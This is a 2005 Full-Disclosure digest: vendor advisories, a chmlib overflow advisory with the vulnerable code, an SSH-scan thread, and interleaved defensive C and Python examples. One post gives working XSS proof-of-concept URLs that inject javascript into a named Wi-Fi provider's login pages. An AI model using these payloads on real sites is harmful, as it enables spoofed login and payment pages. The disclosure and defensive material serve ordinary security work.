Cool - there's more than one way to skin a virus. As long as they take action when necessary to mitigate the actual / real risks.

+ BTW, Andrey, did you bother to use the deep scan,
+ heuristic mode, reviewer mode, etc to see if any
+ of those AV scanners picked up your new variants?
+
+ YES, that is the reason why I prefer to use my AV lab
+ instead of virustotal.com and others. The only exception
+ is CA - I tested the 7.0 version that didn't have reviewer
+ mode (or I didn't find how to enable this).

None of the 15 vendors you listed as vulnerable had any sort of deep scan or heuristic mode that detected your variants?

+ Best regards,
+ Andrey Bayora.

Bottom line: the issue you have discovered/reported is just one of zillions of theoretical attacks / viruses / variants. The known-virus AV vendors only need to address the actual viruses/variants that make it into the wild or are sent to them.

This is the way most AV, and heck even network security, products work. They only address the real or probable threats. If they tried to address all of the theoretical stuff too, their products - and even the internet - would grind to a halt (nightmares like TCP/IP, SMTP, Win32, etc ensure this).

IMO, the best solution for this, and all other AV issues, is to just lock down a *BSD or linux box and use that instead. We can probably all agree on that.

--
x @ bos
[Full-disclosure] HHU #1: It's secure, it's reliable, it's Swiss
It's secure, it's reliable, it's Swiss

HHU
---
Homeless Hackers United is a small group of homeless hackers from Europe and North America. We can't afford to pay for Internet access or hotel rooms. Our only crime is to have a laptop, a wireless card, and a little knowledge. Being homeless gives us the freedom to access and use various open systems, accessible from public places. The following has been tested in the UK, Germany, France and Norway.

Who
---
Swisscom EuroSpot is a wireless service offered in airports, hotels and other public places. Customers buy a certain amount of time online and get access to the wireless network. The login page is of course open in order to join and subscribe to the service. HHU has been able to access and validate this at several hotels and public places.

Severity
---
Medium

Vulnerability
---
XSS, URL evasion

Details
---
Swisscom access points seem to use RADIUS servers to provide Internet access to their customers. We also noticed issues in the RADIUS authentication process that may be published later. After joining the network you will have either to buy access time or log in. The following has been tested in the UK, Germany, France and Norway.

http://login**.swisscom-eurospot.com/error.php?error=nasunknown_ui&UI=XSS
http://login**.swisscom-eurospot.com/login.php?LANG=de&UserID=0&RadiusReply=XSS

Proof of Concept
---
http://login02.swisscom-eurospot.com/error.php?error=nasunknown_ui&UI=Please%20fix%20this%20site
http://login02.swisscom-eurospot.com/error.php?error=nasunknown_ui&UI=%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
http://login02.swisscom-eurospot.com/error.php?error=nasunknown_ui&UI=%3CIFRAME%20SRC=javascript:window.parent.location.replace(%2527http://google.com%2527)%3E%3C/IFRAME%3E

Impacts
---
Change, spoof and fool end-users on the login page or payment page. With a bit of imagination it can be worse.

Timeline
---
Discovered: August 14th 2005
Disclosure: October 28th 2005
Service Provider: no

HHU Policy
---
HHU can't even afford food, and we are not paid to debug software or systems for free. We discover, then publish what we find. Will route tcp/ip packets for food!

"Fool me once, shame on — shame on you. Fool me — you can't get fooled again." — George W. Bush

HHU Credits
---
deepquest for discovering and POC, Mescalito for more POC.

original post http://deepquest.code511.com/blog/more.php?id=319_0_1_0_M
Re: [Full-disclosure] Re: Microsoft AntiSpyware falling furtherbehind
(This is an important day for you, now you know you're not alone ;)

In regard to spyware, at last I hear a clear and logical formulation. Theory is nice, but practice differs. In its broader sense, Spyware is used as a synonym for what the Anti-Spyware Coalition calls Spyware and Other Potentially Unwanted Technologies:

. Spyware (narrow)
. Snoopware
. Unauthorized Keylogger
. Unauthorized Screen Scraper
. Nuisance or Harmful Adware
. Backdoors
. Botnets
. Droneware
. Unauthorized Dialers
. Hijackers
. Rootkits
. Hacker Tools (including port scanners)
. Tricklers
. Unauthorized Tracking Cookies

http://www.antispywarecoalition.org/documents/definitions.htm

+ On Fri, 28 Oct 2005 17:56:32 +0300, Valdis Shkesters said:
+
+ (Hmm.. usually when I reply to Valdis I'm talking to myself... ;)
+
+ + As today I was preparing news for a portal on IT security, I was informed
+ + that the Anti-Spyware Coalition is finalizing its spyware definition.
[..snipped..]
+ + Maybe it would be better to call Trojan horses Trojan horses?
+
+ No, because they're different. Trojan horses (a) get installed under
+ pretense of being something wanted or beneficial (Hey, I'm a neat fun
+ codec that lets you view these movies...) and (b) once there, give the
+ attacker a back door into the system, to do unspecified things (run
+ commands, launch DDoS attacks, send spam, scan for other vulnerable
+ software, upload plugins to extend the Trojan's functionality, or
+ whatever).
+
+ Spyware, on the other hand (a) *may* be installed via Trojan Horse means,
+ but may also be forcibly inserted on a system via a software
+ vulnerability, or added in via the above-mentioned plugin method by an
+ already-present Trojan, and (b) is software that monitors system activity
+ (keystrokes, screen pixmaps, etc) in an effort to acquire credentials or
+ other sensitive information.
[Full-disclosure] [USN-212-1] libgda2 vulnerability
===
Ubuntu Security Notice USN-212-1
October 28, 2005
libgda2 vulnerability
CAN-2005-2958
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

libgda2-1
libgda2-3

The problem can be corrected by upgrading the affected package to version 1.0.4-1ubuntu0.1 (for Ubuntu 4.10), 1.1.99-1ubuntu0.1 (for Ubuntu 5.04), or 1.2.1-2ubuntu3.1 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Steve Kemp discovered two format string vulnerabilities in the logging handler of the Gnome database access library. Depending on the application that uses the library, this could have been exploited to execute arbitrary code with the permission of the user running the application.

Updated packages for Ubuntu 4.10:
[Full-disclosure] [USN-213-1] sudo vulnerability
===
Ubuntu Security Notice USN-213-1
October 28, 2005
sudo vulnerability
CVE-2005-2959
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

sudo

The problem can be corrected by upgrading the affected package to version 1.6.7p5-1ubuntu4.3 (for Ubuntu 4.10), 1.6.8p5-1ubuntu2.2 (for Ubuntu 5.04), or 1.6.8p9-2ubuntu2.1 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Tavis Ormandy discovered a privilege escalation vulnerability in sudo. On executing shell scripts with sudo, the P4 and SHELLOPTS environment variables were not cleaned properly. If sudo is set up to grant limited sudo privileges to normal users, this could be exploited to run arbitrary commands as the target user.

Updated packages for Ubuntu 4.10:

Updated packages for Ubuntu 5.04:
[Full-disclosure] iDefense Security Advisory 10.28.05: Multiple Vendor chmlib CHM File Handling Buffer Overflow Vulnerability
Multiple Vendor chmlib CHM File Handling Buffer Overflow Vulnerability

iDefense Security Advisory 10.28.05
www.idefense.com/application/poi/display?id=332&type=vulnerabilities
October 28, 2005

I. BACKGROUND

chmlib is a library for dealing with Microsoft ITSS/CHM format files.

II. DESCRIPTION

Remote exploitation of a stack overflow vulnerability in chmlib as included in various Linux distributions allows attackers to execute arbitrary code.

The vulnerability specifically exists due to an unchecked memory copy while processing a CHM file. The vulnerability exists in the following code, which is found in chm_lib.c:

    static UChar *_chm_find_in_PMGL(UChar *page_buf,
                                    UInt32 block_len,
                                    const char *objPath)
    {
        [...]
        char buffer[CHM_MAX_PATHLEN+1];

        /* figure out where to start and end */
        cur = page_buf;
        hremain = _CHM_PMGL_LEN;
        if (! _unmarshal_pmgl_header(&cur, &hremain, &header))
            return NULL;
        end = page_buf + block_len - (header.free_space);

        /* now, scan progressively */
        while (cur < end)
        {
            /* grab the name */
            temp = cur;
            strLen = _chm_parse_cword(&cur);
            if (! _chm_parse_UTF8(&cur, strLen, buffer))
                return NULL;
        [..]

_chm_parse_cword can be forced to return a value larger than CHM_MAX_PATHLEN. This value is then used while copying user controlled data into a CHM_MAX_PATHLEN sized stack buffer. This allows the attacker full control over execution flow by overwriting the saved return address on the stack.

III. ANALYSIS

Exploitation could allow attackers to execute arbitrary code with the privileges of the user processing the CHM file. Remote exploitation can be achieved by sending a malicious file in an e-mail message to the target user.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in chmlib 0.35. It is suspected that all versions of chmlib are vulnerable.
The following vendors distribute susceptible chmlib packages within their respective operating system distributions:

FreeBSD Project: FreeBSD 5.4 and prior
Gentoo Foundation Inc.: Gentoo Linux 1.1a, 1.2, 1.4, 2004.0, 2004.1 and 2004.2

V. WORKAROUND

Do not open CHM files sent from an untrusted source.

VI. VENDOR RESPONSE

chmlib-0.36 addresses this vulnerability and is available for download at:

http://freshmeat.net/projects/chmlib/

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-2930 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

09/08/2005 Initial vendor notification
09/09/2005 Initial vendor response
10/28/2005 Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.iDefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
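The chmlib advisory above describes a length read from the file and then used, unchecked, to copy into a CHM_MAX_PATHLEN-sized stack buffer. As an added illustration (not chmlib's code and not iDefense's), the following shows the two checks that copy lacks: the decoded length against the destination size, and against the bytes left in the page. The compressed-word encoding, the 512-byte CHM_MAX_PATHLEN and the sample pages are assumptions and constructions noted in the comments.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Fixed stack buffer size named in the advisory; 512 is chmlib's value
 * to my knowledge, and is only a parameter here. */
#define CHM_MAX_PATHLEN 512

/* Decode one CHM "compressed word". Assumed encoding: big-endian 7-bit
 * groups, high bit set on every byte except the last. Returns 0 if the
 * word runs off the page or has more groups than fit in 64 bits. */
int parse_cword(const unsigned char *cur, const unsigned char *end,
                uint64_t *value, const unsigned char **next)
{
    uint64_t accum = 0;
    int groups = 0;

    while (cur < end) {
        unsigned char b = *cur++;
        if (++groups > 9)             /* 9 groups = 63 bits; more would overflow */
            return 0;
        accum = (accum << 7) | (b & 0x7f);
        if (!(b & 0x80)) {            /* final group */
            *value = accum;
            *next = cur;
            return 1;
        }
    }
    return 0;                         /* page ended inside the word */
}

/* Hardened version of the "read cword, then copy" step: the length is
 * validated against the destination and against the remaining page
 * bytes before a single byte is copied. */
int read_entry_name(const unsigned char *cur, const unsigned char *end,
                    char *out, size_t out_cap, const unsigned char **next)
{
    uint64_t len;

    if (!parse_cword(cur, end, &len, &cur))
        return 0;
    if (len >= out_cap)               /* need len + 1 bytes for the terminator */
        return 0;
    if (len > (uint64_t)(end - cur))  /* name would run past the page */
        return 0;
    memcpy(out, cur, (size_t)len);
    out[len] = '\0';
    *next = cur + len;
    return 1;
}

/* Walks a listing page like the advisory's while (cur < end) loop, but
 * stops at the first entry that fails validation. Returns names accepted. */
int scan_page(const unsigned char *page, size_t page_len)
{
    const unsigned char *cur = page, *end = page + page_len;
    char name[CHM_MAX_PATHLEN + 1];
    int accepted = 0;

    while (cur < end) {
        if (!read_entry_name(cur, end, name, sizeof name, &cur))
            break;
        accepted++;
    }
    return accepted;
}

/* Constructed sample pages (not from any real CHM file): each entry is a
 * cword length followed by that many name bytes. */
static const unsigned char PAGE_OK[] = {
    0x05, 'h', 'e', 'l', 'l', 'o',
    0x03, 'a', 'b', 'c'
};
/* Second entry claims 1024 bytes (0x88 0x00 = 8 * 128): a length larger
 * than CHM_MAX_PATHLEN, the condition the advisory describes. */
static const unsigned char PAGE_OVERSIZED[] = {
    0x05, 'h', 'e', 'l', 'l', 'o',
    0x88, 0x00, 'A', 'A', 'A'
};
/* Second entry claims 10 bytes but only 3 remain in the page. */
static const unsigned char PAGE_TRUNCATED[] = {
    0x05, 'h', 'e', 'l', 'l', 'o',
    0x0a, 'x', 'y', 'z'
};

int scan_ok(void)        { return scan_page(PAGE_OK, sizeof PAGE_OK); }
int scan_oversized(void) { return scan_page(PAGE_OVERSIZED, sizeof PAGE_OVERSIZED); }
int scan_truncated(void) { return scan_page(PAGE_TRUNCATED, sizeof PAGE_TRUNCATED); }

/* Decoded value of the two-byte cword in PAGE_OVERSIZED. */
uint64_t oversized_length(void)
{
    uint64_t v = 0;
    const unsigned char *next;
    parse_cword(PAGE_OVERSIZED + 6, PAGE_OVERSIZED + sizeof PAGE_OVERSIZED, &v, &next);
    return v;
}

int main(void)
{
    printf("well-formed page:  %d names accepted\n", scan_ok());
    printf("oversized length:  %d names accepted\n", scan_oversized());
    printf("truncated name:    %d names accepted\n", scan_truncated());
    return 0;
}
```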
Re: [Full-disclosure] Brain dead SSH scans from Italy
Etaoin Shrdlu wrote:
+ Well, I'm stumped. I mean, really stumped.
+
+ I've had a host scanning my network for the past three days...
+
+ I'm at a loss. If anyone knows Italian (I don't), and can contact one of:
+
+ [EMAIL PROTECTED]
+ [EMAIL PROTECTED]
+ [EMAIL PROTECTED]
+
+ or anyone at ocem.com, please, let them know that the machine is
+ compromised, and that they need to take it off line, and clean it up.

Thanks to whomever finally got through, however you did it. I had actually allowed one host to start responding, and it had gotten to the part I always least understand, i.e. the tries for root's password. I mean, really, are there that many hosts out there with root accounts that can be guessed with an automated password guesser?

Anyway, it suddenly stopped, and stopped attempting the other machine(s) as well. Whew.

Thanks again.

--
There are two ways, my friend, that you can be rich in life. One is to make a lot of money and the other is to have few needs.
William Sloane Coffin, Letters to a Young Doubter
Re: [Full-disclosure] Brain dead SSH scans from Italy
On Fri, 28 Oct 2005 13:14:31 PDT, Etaoin Shrdlu said:
+ always least understand, i.e. the tries for root's password. I mean,
+ really, are there that many hosts out there with root accounts that can
+ be guessed with an automated password guesser?

You're new here, aren't you? :)
Re: [Full-disclosure] Brain dead SSH scans from Italy
Etaoin Shrdlu wrote:
+ Well, I'm stumped. I mean, really stumped.
+
+ I've had a host scanning my network for the past three days, and it
+ initially looked like one of the automated scans we've all become so
+ familiar with (unfortunately). Naturally, the automatic defense was
+ engaged, and I thought that would be the end of it. Nope.
[..snipped..]
+ I'm at a loss. If anyone knows Italian (I don't), and can contact one of:
+
+ [EMAIL PROTECTED]
+ [EMAIL PROTECTED]
+ [EMAIL PROTECTED]
+
+ or anyone at ocem.com, please, let them know that the machine is
+ compromised, and that they need to take it off line, and clean it up.
+
+ TIA and all that.

I'm Italian; if you want, send me the text of the email for:

[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]

and I will take care of the translation myself.

Regards
Vania
[Full-disclosure] [USN-151-3] zlib vulnerabilities
===
Ubuntu Security Notice USN-151-3
October 28, 2005
aide vulnerabilities
CVE-2005-1849, CVE-2005-2096
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

aide

The problem can be corrected by upgrading the affected package to version 0.10-3ubuntu0.1 (for Ubuntu 4.10), 0.10-4ubuntu0.1 (for Ubuntu 5.04), or 0.10-6.1ubuntu0.1 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

USN-148-1 and USN-151-1 fixed two security flaws in zlib, which could be exploited to cause Denial of Service attacks or even arbitrary code execution with malicious data streams. Since aide is statically linked against the zlib library, it is also affected by these issues. The updated packages have been rebuilt against the fixed zlib.

Updated packages for Ubuntu 4.10:

Updated packages for Ubuntu 5.04:
http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-4ubuntu0.1.diff.gz Size/MD5:29359 366869464761485ef3d29915ae294ab1 http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-4ubuntu0.1.dsc Size/MD5: 703 28126aa389a49cc5354e6c704237b334 http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10.orig.tar.gz Size/MD5: 234184 39eb7d21064cac7b409c45d038b86cd8 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-4ubuntu0.1_amd64.deb Size/MD5: 465630 63bc8c81c424d4bfb00c233a2e97695d i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-4ubuntu0.1_i386.deb Size/MD5: 431590 109018a99a6588f7f48ee8be595bf2b6 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-4ubuntu0.1_powerpc.deb Size/MD5: 471800 73571a01182d41ec0f5ce73cd5b8cdbc Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-6.1ubuntu0.1.diff.gz Size/MD5:36588 1428d11ede7d4d4996b9f6d719aa9557 http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-6.1ubuntu0.1.dsc Size/MD5: 763 715edd426517405c0f81feff1e7511c7 http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10.orig.tar.gz Size/MD5: 234184 39eb7d21064cac7b409c45d038b86cd8 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-6.1ubuntu0.1_amd64.deb Size/MD5: 513230 9a1477b093630a538262a137d7c37730 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-6.1ubuntu0.1_i386.deb Size/MD5: 451422 41c84d68e6e4e69fe919109e00576051 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-6.1ubuntu0.1_powerpc.deb Size/MD5: 581134 df0712d4d04b4854243c01f7696eb0c5 signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. 
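The advisory's point about aide generalizes: any binary that statically links zlib keeps the vulnerable code after the libz package is updated, so the only way to know what is affected is to look inside the binaries. The following is an added example, not part of the Ubuntu notice or of aide. It relies on the version strings zlib compiles into its inflate and deflate code (" inflate X.Y.Z Copyright ... " and " deflate X.Y.Z Copyright ... "), which survive static linking, and it treats 1.2.3 as the first upstream release carrying both fixes; that threshold is an assumption to confirm against USN-148-1 and USN-151-1 for your own distribution. The ELF-like sample bytes are constructed for the demonstration.

```python
"""Find statically linked zlib copies by their embedded version strings.

Added example, not from the Ubuntu advisory. The zlib source embeds the
strings " inflate X.Y.Z Copyright ... " and " deflate X.Y.Z Copyright ... "
(inflate_copyright / deflate_copyright), so a binary that links zlib
statically carries the library version in plain text. A dynamically
linked binary only references libz.so and yields nothing here.
"""
import re
import sys
from pathlib import Path

# Matches the version number in zlib's copyright strings; 2 to 4 components
# (e.g. 1.2.2 or 1.2.2.2) because zlib has used both forms.
ZLIB_VERSION_RE = re.compile(rb"\b(inflate|deflate) (\d+(?:\.\d+){1,3}) Copyright")

# Assumption: 1.2.3 is the first upstream release that fixes
# CVE-2005-1849 and CVE-2005-2096. Adjust for your distribution's backports.
FIXED_VERSION = (1, 2, 3)


def parse_version(text: str) -> tuple:
    """'1.2.2.2' -> (1, 2, 2, 2); tuples compare component-wise."""
    return tuple(int(part) for part in text.split("."))


def find_zlib_versions(data: bytes) -> set:
    """Return the set of zlib version strings embedded in raw file bytes."""
    return {m.group(2).decode("ascii") for m in ZLIB_VERSION_RE.finditer(data)}


def is_vulnerable(version: str, fixed: tuple = FIXED_VERSION) -> bool:
    """True if the embedded zlib predates the fixed release."""
    return parse_version(version) < fixed


def scan_bytes(data: bytes) -> list:
    """[(version, vulnerable)] for every zlib copy found, sorted by version."""
    return [(v, is_vulnerable(v)) for v in sorted(find_zlib_versions(data), key=parse_version)]


def scan_file(path) -> list:
    return scan_bytes(Path(path).read_bytes())


# Constructed sample: the kind of content an ELF with zlib 1.2.2 linked
# statically would contain (not a real binary).
SAMPLE_STATIC_BINARY = (
    b"\x7fELF" + b"\x00" * 12
    + b" inflate 1.2.2 Copyright 1995-2004 Mark Adler \x00"
    + b" deflate 1.2.2 Copyright 1995-2004 Jean-loup Gailly \x00"
    + b"\x00" * 16
)

# Constructed sample: dynamically linked, only the soname is present.
SAMPLE_DYNAMIC_BINARY = b"\x7fELF" + b"\x00" * 12 + b"libz.so.1\x00inflate\x00"


def main(argv):
    paths = argv[1:] or []
    if not paths:
        print("usage: zlibscan.py FILE...", file=sys.stderr)
        print("sample:", scan_bytes(SAMPLE_STATIC_BINARY))
        return 0
    rc = 0
    for p in paths:
        for version, vuln in scan_file(p):
            flag = "VULNERABLE" if vuln else "ok"
            print(f"{p}: zlib {version} ({flag})")
            rc = rc or int(vuln)
    return rc


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it over /usr/bin, /usr/sbin and any vendor-supplied binaries (`find /usr/bin /usr/sbin -type f -print0 | xargs -0 python3 zlibscan.py`). A hit means the program must be rebuilt against a fixed zlib, exactly as this notice does for aide. The check is a heuristic: a build that strips or patches the copyright strings, or a copy of the inflate code that never carried them, will not be found, so absence of a hit is not proof of absence.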
[Full-disclosure] [USN-206-2] Fixed lynx packages for USN-206-1
===
Ubuntu Security Notice USN-206-2            October 29, 2005
lynx regression fix
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

lynx

The problem can be corrected by upgrading the affected package to version 2.8.5-1ubuntu1.2 (for Ubuntu 4.10), 2.8.5-2ubuntu0.5.04.1 (for Ubuntu 5.04), or 2.8.5-2ubuntu0.5.10.1 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

USN-206-1 fixed a security vulnerability in lynx. Unfortunately the fix contained an error that caused lynx to crash under certain circumstances. The updated packages fix this.

Updated packages for Ubuntu 4.10:

  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.2.diff.gz
      Size/MD5:    17724 80e29ed0df5f9ab6cba51192efcd0f40
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.2.dsc
      Size/MD5:      620 304b56403fc4cf556ceb014d26b38df4
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz
      Size/MD5:  2984352 5f516a10596bd52c677f9bfd9579bc28

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.2_amd64.deb
      Size/MD5:  1882868 299d91958367e3ba3d045dbc4728cdf7

  i386 architecture (x86 compatible Intel/AMD):
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.2_i386.deb
      Size/MD5:  1833374 9097cf80bd63bd2b5894743330d68553

  powerpc architecture (Apple Macintosh G3/G4/G5):
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.2_powerpc.deb
      Size/MD5:  1878522 403692e24c015f8f87e40c3a7a57985a

Updated packages for Ubuntu 5.04:

  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.1.diff.gz
      Size/MD5:    18059 be5f0fa4921f982405125e60f4f551af
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.1.dsc
      Size/MD5:      630 29b531cd83fefaa675123c6ec002bec2
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz
      Size/MD5:  2984352 5f516a10596bd52c677f9bfd9579bc28

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.1_amd64.deb
      Size/MD5:  1881920 543df451db2a2dc94913abddafe4503e

  i386 architecture (x86 compatible Intel/AMD):
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.1_i386.deb
      Size/MD5:  1832034 e5ac9c24ae2f86ccb8576227824fb975

  powerpc architecture (Apple Macintosh G3/G4/G5):
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.1_powerpc.deb
      Size/MD5:  1878454 fb5337e70bf1d3d554976c171a4ff895

Updated packages for Ubuntu 5.10:

  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.1.diff.gz
      Size/MD5:    18058 c3ebb84869db50e98ee63da53190
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.1.dsc
      Size/MD5:      630 25d773746e771160b7599970153b3c07
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz
      Size/MD5:  2984352 5f516a10596bd52c677f9bfd9579bc28

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.1_amd64.deb
      Size/MD5:  1901272 5d15ae7d8b51875cd867864b47d5d2d5

  i386 architecture (x86 compatible Intel/AMD):
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.1_i386.deb
      Size/MD5:  1833236 37e7437cbb088ddd91aa8a2cfae42625

  powerpc architecture (Apple Macintosh G3/G4/G5):
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.1_powerpc.deb
      Size/MD5:  1880942 78a7f90f4414e73c289d1d9756ed1dc7
Re: [Full-disclosure] Brain dead SSH scans from Italy
Etaoin Shrdlu wrote:

> [snip]
> Thanks to whomever finally got through, however you did it. I had actually allowed one host to start responding, and it had gotten to the part I always least understand, i.e. the tries for root's password. I mean, really, are there that many hosts out there with root accounts that can be guessed with an automated password guesser?
> ...

Define "that many"...

It's not about the total number; it's simply about the fact that there really are some, and we know that here "some" == quite a few more than one.

Better to think of it in terms of a proportion though, then allow that the law of large numbers kicks in _on both the attackers' and victims' sides of the equation_. If the potential attackers can run their probes from a botnet, then they reduce their own workload significantly and are not even risking discovery or any real loss if they are tracked or shut down, as it is all but guaranteed that all they will lose is a bot or two in the odd case where someone cares enough to try to track down the attacker. And if the available victims are, say, 0.00015% of all machines, scanning a few million machines gets you plenty more new victims. And that's not even considering that some machines may be more worthwhile cracking than others...

Regards,

Nick FitzGerald
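The thread above asks how many hosts fall to automated root password guessing; the check a practitioner wants on the receiving end is what the scanner actually tried against sshd. The following is an added example (not from either poster) that parses OpenSSH's "Failed password" log lines, counts attempts per source address, and flags sources that exceed a threshold, separating root-password tries from the rest. The log lines are constructed for the demonstration and the threshold of 5 is an arbitrary assumption.

```python
"""Summarize SSH password-guessing activity from sshd log lines.

Added example, not from the thread. Parses OpenSSH auth log entries of the
forms
  sshd[PID]: Failed password for root from A.B.C.D port N ssh2
  sshd[PID]: Failed password for invalid user NAME from A.B.C.D port N ssh2
and reports, per source address, which accounts were tried and how often.
"""
import re
from collections import Counter, defaultdict

FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?P<invalid>invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[0-9a-fA-F.:]+) port \d+ ssh2"
)

# Constructed sample log (not real traffic). 192.0.2.10 is the scanner,
# 198.51.100.7 is one mistyped password from a legitimate user.
SAMPLE_AUTH_LOG = """\
Oct 29 03:12:01 host sshd[4021]: Failed password for root from 192.0.2.10 port 51001 ssh2
Oct 29 03:12:03 host sshd[4021]: Failed password for root from 192.0.2.10 port 51001 ssh2
Oct 29 03:12:05 host sshd[4021]: Failed password for root from 192.0.2.10 port 51001 ssh2
Oct 29 03:12:08 host sshd[4025]: Failed password for root from 192.0.2.10 port 51004 ssh2
Oct 29 03:12:10 host sshd[4025]: Failed password for root from 192.0.2.10 port 51004 ssh2
Oct 29 03:12:12 host sshd[4025]: Failed password for root from 192.0.2.10 port 51004 ssh2
Oct 29 03:12:15 host sshd[4030]: Failed password for invalid user admin from 192.0.2.10 port 51009 ssh2
Oct 29 03:12:17 host sshd[4030]: Failed password for invalid user admin from 192.0.2.10 port 51009 ssh2
Oct 29 03:14:40 host sshd[4101]: Failed password for alice from 198.51.100.7 port 40022 ssh2
Oct 29 03:14:52 host sshd[4101]: Accepted publickey for alice from 198.51.100.7 port 40022 ssh2
"""


def parse_failures(lines):
    """Yield (ip, user, invalid_user) for every failed password attempt."""
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            yield m.group("ip"), m.group("user"), bool(m.group("invalid"))


def attempts_by_source(lines) -> dict:
    """{ip: {user: count}} over all failed password attempts."""
    per_ip = defaultdict(Counter)
    for ip, user, _ in parse_failures(lines):
        per_ip[ip][user] += 1
    return {ip: dict(c) for ip, c in per_ip.items()}


def flag_guessers(lines, threshold: int = 5) -> dict:
    """Sources with at least `threshold` failed attempts (threshold is an assumption)."""
    return {ip: users for ip, users in attempts_by_source(lines).items()
            if sum(users.values()) >= threshold}


def root_attempts(lines) -> dict:
    """{ip: count} of failed password attempts against root specifically."""
    return {ip: users["root"] for ip, users in attempts_by_source(lines).items()
            if "root" in users}


if __name__ == "__main__":
    import sys
    source = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_AUTH_LOG.splitlines()
    lines = list(source)
    for ip, users in flag_guessers(lines).items():
        print(f"{ip}: {sum(users.values())} failed attempts, accounts tried: {sorted(users)}")
    print("root attempts:", root_attempts(lines))
```

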